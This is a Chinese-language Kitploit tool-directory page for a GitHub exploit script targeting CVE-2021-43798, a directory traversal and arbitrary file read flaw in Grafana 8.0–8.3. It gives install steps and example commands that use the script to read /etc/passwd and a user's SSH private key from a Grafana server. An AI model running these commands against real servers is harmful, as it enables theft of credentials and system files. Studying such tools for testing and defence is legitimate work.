Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/wagneralves/cve-2021-43798
漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试红队
GitHubwagneralves/cve-2021-43798

CVE-2021-43798

Grafana 目录遍历和任意文件读取

查看仓库
122年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2021-43798

Grafana 中的目录遍历和任意文件读取漏洞

作者:
Wagner Alves - 红队分析师

该漏洞利用 Grafana 8.0 - 8.3 版本中的目录遍历和任意文件读取漏洞,能够读取诸如 /etc/passwd、/etc/hosts、/home/user/.ssh/id_rsa、/etc/os-release 以及其他有趣的文件。

安装

root@kitploit:~
git clone https://github.com/wagneralves/CVE-2021-43798.git
cd CVE-2021-43798
chmod +x ExploitGrafana.sh

使用

root@kitploit:~
示例:./ExploitGrafana.sh -h http://domain.xpto:3000 -f /etc/passwd

root@kitploit:~
示例:./ExploitGrafana.sh -h http://domain.xpto:3000 -f /home/user/.ssh/id_rsa

root@kitploit:~
示例:./ExploitGrafana.sh -h http://domain.xpto:3000 -f /home/user/.ssh/id_rsa

下载工具